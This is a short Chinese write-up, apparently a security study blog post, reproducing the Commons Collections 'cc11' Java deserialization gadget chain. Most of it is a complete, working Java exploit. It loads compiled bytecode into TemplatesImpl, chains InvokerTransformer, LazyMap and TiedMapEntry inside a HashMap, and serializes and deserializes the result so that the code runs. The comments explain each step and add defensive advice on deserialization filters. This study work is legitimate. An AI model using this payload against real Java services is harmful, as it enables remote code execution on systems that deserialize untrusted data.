java 反序列化 cc11 复现

cc11 就是对我们调试过的 cc3（出口为 LazyMap、且没有绕过 InvokerTransformer 的那个版本）进行修改，使其不再出现非 JavaSE 中的数组。换句话说，就是绕过了 ChainedTransformer。
直接来看exp

package org.example;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

import java.io.*;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.ExceptionPredicate;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;

import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

/**
 * Reproduction of the CommonsCollections11 (cc11) deserialization gadget chain.
 *
 * <p>The actual weakness exercised here is {@link #unserial()}: it calls
 * {@code ObjectInputStream.readObject()} on a stream with no deserialization
 * filter, so whatever object graph the stream describes is rebuilt, and the
 * Commons Collections classes on the classpath supply the side effects.
 * On the defending side this means: do not deserialize untrusted bytes with
 * native Java serialization at all, or install an allowlist
 * {@code ObjectInputFilter} (JEP 290) that rejects classes such as
 * {@code LazyMap}, {@code TiedMapEntry}, {@code InvokerTransformer} and
 * {@code TemplatesImpl}; a serialized HashMap carrying those class names is
 * a strong detection signal.
 *
 * <p>Compared with cc3, the {@code ChainedTransformer} is dropped: a single
 * {@link InvokerTransformer} sits behind a {@link LazyMap}, and the key that
 * LazyMap is asked to resolve is the {@link TemplatesImpl} itself.
 */
public class Main {
    /**
     * Builds the payload, writes it to {@code ./cc1.bin} and reads it back.
     *
     * <p>Construction order matters. The {@link TiedMapEntry} is first inserted
     * into the HashMap while its backing map is a harmless
     * {@code LazyMap(ConstantTransformer(null))}; only afterwards is its
     * private {@code map} field swapped via reflection to the LazyMap that
     * holds the {@code InvokerTransformer}. That is what keeps the chain from
     * firing during {@code put()} in this JVM and defers it to the
     * {@code readObject()} in {@link #unserial()}.
     *
     * @param args unused
     * @throws Exception any reflection, I/O or deserialization failure
     */
    public static void main(String[] args) throws Exception{
        // Carrier object: TemplatesImpl.newTransformer() defines and instantiates
        // the class held in _bytecodes.
        TemplatesImpl templatesimpl = new TemplatesImpl();

        Class<?> clazz = templatesimpl.getClass();
        // _name must be non-null, otherwise newTransformer() returns early
        // without touching _bytecodes.
        Field field = clazz.getDeclaredField("_name");
        field.setAccessible(true);
        field.set(templatesimpl, "test");

        Field field2 = clazz.getDeclaredField("_bytecodes");
        field2.setAccessible(true);
        // Author's local path to a compiled class file; presumably its
        // constructor/static initializer is what ends up executing.
        byte[] code = Files.readAllBytes(Paths.get("F:\\idea_workspace\\cc3\\target\\classes\\org\\example\\test.class"));
        byte[][] codes = {code};
        field2.set(templatesimpl, codes);

        // _tfactory is used when the translet class is defined. The field is
        // transient, so this assignment only matters if the chain were to fire
        // before serialization; TemplatesImpl.readObject() re-creates it anyway.
        Field field3 = clazz.getDeclaredField("_tfactory");
        field3.setAccessible(true);
        field3.set(templatesimpl, new TransformerFactoryImpl());

        // transform(obj) reflectively calls obj.newTransformer() with no
        // parameter types and no arguments (the two nulls).
        InvokerTransformer it = new InvokerTransformer("newTransformer", null, null);

        // LazyMap.get(key) on a missing key calls factory.transform(key); the
        // key will be templatesimpl (see the TiedMapEntry below).
        Map lazymap = LazyMap.decorate(new HashMap(), it);// modified here (vs. cc3)
        // Built with a no-op factory first so that hashMap.put() below can
        // hash the entry without triggering anything.
        TiedMapEntry tiedMapEntry = new TiedMapEntry(LazyMap.decorate(new HashMap(), new ConstantTransformer(null)), templatesimpl);// modified here (vs. cc3)

        HashMap<Object, Object> hashMap = new HashMap<>();
        // put() calls tiedMapEntry.hashCode() -> getValue() -> map.get(templatesimpl);
        // with ConstantTransformer(null) that just stores a null and returns.
        hashMap.put(tiedMapEntry, null);

        // Now swap in the live LazyMap. On the receiving side HashMap.readObject()
        // re-hashes the key, TiedMapEntry.hashCode() reaches LazyMap.get(), and
        // InvokerTransformer invokes newTransformer() on templatesimpl.
        Class clazz1 = TiedMapEntry.class;
        Field field1 = clazz1.getDeclaredField("map");
        field1.setAccessible(true);
        field1.set(tiedMapEntry, lazymap);

        serial(hashMap);
        unserial();
    }

    /**
     * Serializes {@code obj} to {@code ./cc1.bin}.
     *
     * <p>The stream is never closed; acceptable for a one-shot PoC, but
     * try-with-resources is the norm for anything else.
     *
     * @param obj object graph to write
     * @throws Exception on I/O or serialization failure
     */
    public static void serial(Object obj) throws Exception {
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("./cc1.bin"));
        out.writeObject(obj);
    }

    /**
     * Reads {@code ./cc1.bin} back with an unfiltered {@code ObjectInputStream}.
     *
     * <p>This is the sink the chain relies on: {@code readObject()} rebuilds
     * the HashMap and thereby runs the gadget above. The return value is
     * discarded on purpose; the side effect is the point. A hardened version
     * would call {@code in.setObjectInputFilter(...)} with an allowlist before
     * reading, or avoid native serialization entirely.
     *
     * @throws Exception on I/O or deserialization failure
     */
    public static void unserial() throws Exception {
        ObjectInputStream in = new ObjectInputStream(new FileInputStream("./cc1.bin"));
        in.readObject();
    }
}

看了一下,和网上的版本不太一样.利用链和cc3一样,没啥可说的.
